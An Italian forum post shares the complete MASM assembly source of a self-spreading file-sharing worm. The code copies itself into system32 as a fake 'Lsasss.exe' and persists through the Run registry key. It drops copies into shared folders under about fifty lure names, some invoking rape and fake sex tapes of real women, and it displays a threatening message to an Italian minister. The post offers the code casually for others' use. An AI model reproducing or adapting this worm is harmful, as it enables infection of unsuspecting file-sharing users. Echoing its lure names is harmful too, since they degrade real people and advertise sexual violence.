Ola raga era un po che non postavo le mie simpatiche(lol) creature. Bene oggi vi posto un mio worm scritto completamente in assembly che ha queste features:
-Si copia in Cwindows\system32
-Si autoavvia ad ongi avvio di sistema
-si copia in tutte le cartelle conteneti la parola "shar"(tipo shared o shar)
con 50 nomi diversi
-killa diversi versioni dello storm worm(un altro worm)
-usa le mutex per prevenire piu istanze di se stesso
enjoy XD
-Si copia in Cwindows\system32
-Si autoavvia ad ongi avvio di sistema
-si copia in tutte le cartelle conteneti la parola "shar"(tipo shared o shar)
con 50 nomi diversi
-killa diversi versioni dello storm worm(un altro worm)
-usa le mutex per prevenire piu istanze di se stesso
Codice:
;
; P2PREVENGE WORM
;
; WRITTEN IN ASSEMBLY BY DELTA
; COMPILARE CON MASM
;
.486
.model flat, stdcall
option casemap:none
include shlwapi.inc
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include shell32.inc
include gdi32.inc
.list
includelib gdi32.lib
includelib shell32.lib
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
includelib shlwapi.lib
mNextListEntry MACRO ML
cld
xor eax, eax
or ecx, -1
repnz scasb
cmp byte ptr[edi], 0
jnz ML
ENDM
.data
szCopyright db 'Komodo worm written in assembly by Un adolescente arrabbiato, 2008/03/23 italy',0
szMessage db 'Fioroni: ci hai rovinato e ora noi rovineremo te.',0
szKeyName db 'Lsass',0
szREGSZ db 'REG_SZ',0
szTestKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
szLsass db '\Lsasss.exe',0
szMutex db 'Fuck_fiorono',0
hkey dd ?
lpdwDisp dd ?
dayt dd ?
szShar db "shar",0
szMessageTitle db 'Fioroni',0
szMessageBody db "L'italia è un bel paese. Peccato che fioroni ha rovinato tutto davanti al mondo intero.",0
db "Ora il sistema scolastico è in crisi. 7 alluni su 10 bocciati. Ma stiamo scherzando?",13,10
db "Fioroni: questo è un assaggio di quello che possiamo fare. Non ci sfidare o faremo",13,10
db "di peggio.",13,10
db "For english people:",13,10
db " Komodo worm ",13,10
db "written in assembly by UNADOLESCENTEARRABBIATO 2008-03-21 23:45 ",0
szHDDSlash db "\",0
szHDDSearch db "*.*",0
szHDDSearchMask db "*.*",0
szSharNames db "Autocad 2008 FULL-ENG-ITA-FRA-SPA-DE.exe", 0
db "Adobe Photoshop Full Version.exe", 0
db "Iphone source code.zip .exe",0
db "Visual c++ 6 FULL.exe",0
db "WinRAR-Full.exe",0
db "Windows Vista ultimate full (8 languages).exe",0
db "WINDOWS SOURCE CODE.zip .exe",0
db "jenna jameson screensaver.scr",0
db "Opera 10 FULL.exe",0
db "Internet explorer 8.exe",0
db "Brianna banks and jenna jameson.mpeg .exe",0
db "Norton AntiVirus 2008.exe",0
db "Halo 3 (xbox360).iso .exe",0
db "NETSKY SOURCE CODE.zip .exe",0
db "Kazaa Lite.zip .exe",0
db "Windows crack all versione .zip .exe",0
db "Rape-women rape by a chinese and suck him dick.mpeg .exe",0
db "Britney spears naked.jpeg .exe",0
db "Nero burning 2008 FULL.exe",0
db "Visual Studio.NET 2008 FULL.zip .exe",0
db "Eva longoria sex tape.avi .exe",0
db "Katie Holmes sex tape.avi .exe",0
db "Nasa secret file leaked.rar .exe",0
db "area51 leaked files.zip .exe",0
db "Windows seven alpha leaked.iso .exe",0
db "Windows xp keygen generator(by SILENT).exe",0
db "I.Am.Legend.DVDRip.XviD-AXXO.avi .exe",0
db "googlebot source code leaked(cpp).zip .exe",0
db "msn source code(asp).zip .exe",0
db "yahoo email(3000) leak.mbox .exe",0
db "www.parisexposed.com(all images and video).zip .exe",0
db "OSX LEOPARD FOR I386.iso .exe",0
db "4 women raped by two men.avi .exe",0
db "SkyOS source code.zip .exe",0
db "kazaa source code.zip .exe",0
db "intel email leak.pst .exe",0
db "RIAA email leak.pst .exe",0
db "Cloverfield.2008.DVDRip.AXXO.avi .exe";0
db "Die.Hard.4.2007.DVDRip.AXXO.avi .exe",0
db "secretary raped.avi .exe",0
db "Avril.Lavigne raped(11.12.2007).avi .exe",0
db "Nicole Kidman sex tape.avi .exe",0
db " White house leaked email.doc .exe", 0
db "Bill clinton sex tape image(SEX).zip .exe",0
db "Windows vista source code(by renegade).zip .exe",0
db "Paris hilton new sex tape(with kim kardashian).avi .exe",0
db "Gmail source code(ajax).tar.gz .exe",0
db " Myspace source code(php).zip .exe",0,0
szStormMutex db 'klllekkdkkd',0
db 'A8dK894Lm9#F2i$s0Bq2X',0
db 'uri40333444',0
db 'hlkjlkjlklk34d',0
db 'd3kb5sujs50lq2mr',0,0
.data?
szSysDirFileName db MAX_PATH+1 dup(?)
szRunFileName db MAX_PATH+1 dup(?)
.code
KillStorm proc
mov edi, offset szStormMutex
@next:
invoke CreateMutex, NULL, TRUE, edi
mNextListEntry @next
Ret
KillStorm EndP
regnow proc
LOCAL hkHandle: DWORD
invoke GetSystemDirectory, offset szSysDirFileName, MAX_PATH
invoke lstrcat, offset szSysDirFileName, offset szLsass
invoke GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szTestKey, addr hkHandle
invoke lstrlen, offset szSysDirFileName
invoke RegSetValueEx, hkHandle, offset szKeyName, 0, REG_SZ, offset szSysDirFileName, eax
invoke RegCloseKey, hkHandle
Ret
regnow EndP
Mutex proc
mov edi, offset szMutex
invoke CreateMutex, NULL, FALSE, edi
Ret
Mutex EndP
CopyShare proc uses edi lpPath: DWORD
LOCAL adv_path: DWORD
invoke GlobalAlloc, GMEM_FIXED, 65000
mov adv_path, eax
mov edi, offset szSharNames
@next:
push edi
invoke lstrcpy, adv_path, lpPath
push adv_path
call lstrcat
invoke CopyFile, offset szSysDirFileName, adv_path, TRUE
mNextListEntry @next
invoke GlobalFree, adv_path
Ret
CopyShare EndP
HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
LOCAL hFind: DWORD
LOCAL FindFileData: DWORD
invoke LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
mov FindFileData, eax
invoke lstrlen, lpPath
mov edi, eax
invoke lstrcat, lpPath, offset szHDDSearchMask
invoke FindFirstFile, lpPath, FindFileData
mov hFind, eax
inc eax
jz @end
@find_loop:
mov eax, lpPath
mov byte ptr[eax + edi], 0
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
cmp word ptr[edx], '.'
jz @skip
cmp word ptr[edx], '..'
jz @skip
invoke lstrcat, lpPath, edx
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.dwFileAttributes
test dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY
invoke StrRChr, lpPath, NULL, '\'
.IF eax
inc eax
invoke StrStrI, eax, offset szShar
.ENDIF
push eax
invoke lstrcat, lpPath, offset szHDDSlash
pop eax
.IF eax
invoke CopyShare, lpPath
.ENDIF
invoke HDDScanFromPath, lpPath, szBasePath
jmp @skip
@skip:
invoke Sleep, 2
invoke FindNextFile, hFind, FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@end:
invoke LocalFree, FindFileData
ret
HDDScanFromPath endp
HDDScanDrive proc szDrive: DWORD
LOCAL szLongPath: DWORD
invoke GlobalAlloc, GPTR, 65536
mov szLongPath, eax
invoke lstrcpy, eax, szDrive
.IF eax
invoke HDDScanFromPath, szLongPath, szLongPath
.ENDIF
invoke GlobalFree, szLongPath
ret
HDDScanDrive endp
HDDScanDrives proc uses esi
LOCAL DrvBuf: DWORD
invoke GlobalAlloc, GPTR, 8192
mov DrvBuf, eax
invoke GetLogicalDriveStrings, 8191, eax
mov esi, DrvBuf
IFDEF TESTVERSION
invoke HDDScanDrive, offset szHDDBasePath
ELSE
@get_next_drv:
.IF byte ptr[esi]
invoke GetDriveType, esi
.IF eax == DRIVE_FIXED
invoke HDDScanDrive, esi
.ENDIF
invoke lstrlen, esi
add esi, eax
inc esi
jmp @get_next_drv
.ENDIF
ENDIF
invoke GlobalFree, DrvBuf
ret
HDDScanDrives endp
Message proc
invoke Sleep, 216000
invoke MessageBox, NULL, szMessageBody, szMessageTitle,MB_ICONWARNING
Ret
Message EndP
start:
invoke regnow
invoke Mutex
invoke HDDScanDrives
invoke KillStorm
invoke Message
ret
end start
enjoy XD